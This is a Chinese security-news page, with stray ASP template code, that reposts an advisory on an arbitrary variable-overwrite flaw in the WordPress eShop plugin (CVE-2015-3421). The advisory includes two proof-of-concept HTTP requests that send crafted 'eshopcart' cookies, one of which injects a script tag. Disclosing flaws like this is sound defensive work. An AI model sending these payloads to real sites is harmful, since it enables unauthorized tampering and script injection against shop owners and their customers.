<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("任意,漏洞") PageTitle=stripHTML("WordPress eShop插件任意文件覆盖漏洞(CVE-2015-3421)") ArticleIntro=stripHTML("WordPress eShop插件任意文件覆盖漏洞(CVE-2015-3421),WordPresseShop插件任意文件覆盖漏洞(CVE-2015-3421)发布日期:2015-05-02更新日期:") Articlecontent=stripHTML("
 WordPress eShop插件任意文件覆盖漏洞(CVE-2015-3421)发布日期:2015-05-02

更新日期:2015-05-13

受影响系…") ModuleName = stripHTML("exploits") InfoID = stripHTML("199402") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.org/") ChannelDir=stripHTML("exploits") %> WordPress eShop插件任意文件覆盖漏洞(CVE-2015-3421) - 华盟网 - http://www.77169.org
您现在的位置: 华盟网 >> 漏洞 >> 最新漏洞 >> WordPress >> 正文

WordPress eShop插件任意文件覆盖漏洞(CVE-2015-3421)

2015/5/28 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

WordPress eShop插件任意文件覆盖漏洞(CVE-2015-3421)

发布日期:2015-05-02
更新日期:2015-05-13
受影响系统:
WordPress eShop <= 6.3.11

描述:

BUGTRAQ ID: 74477
CVE(CAN) ID: CVE-2015-3421
eShop是WordPress的一个购物车插件。
eShop没有有效验证"eshopcart" HTTP cookie内的用户输入,在实现上存在安全漏洞,远程攻击者利用此漏洞可覆盖受影响应用上下文中的任意php变量,导致任意php代码执行。
<*来源:High-Tech Bridge Security Research Lab

链接:https://www.htbridge.com/advisory/HTB23255
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
High-Tech Bridge Security Research Lab ()提供了如下测试方法:
GET /shopping-cart-2/checkout/ HTTP/1.1
Cookie: eshopcart=wpdb%3d1%7C;
GET /shopping-cart-2/checkout/ HTTP/1.1
Cookie: eshopcart=phone%3dsdfg'"><script>alert(/ImmuniWeb/)</script>
建议:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://wordpress.org/

本文地址:http://www.linuxidc.com/Linux/2015-05/117429.htm


WordPress eShop插件任意文件覆盖漏洞(CVE-2015-3421)

本文系统(linux)相关术语:linux系统 鸟哥的linux私房菜 linux命令大全 linux操作系统



  • 上一篇漏洞:

  • 下一篇漏洞: 没有了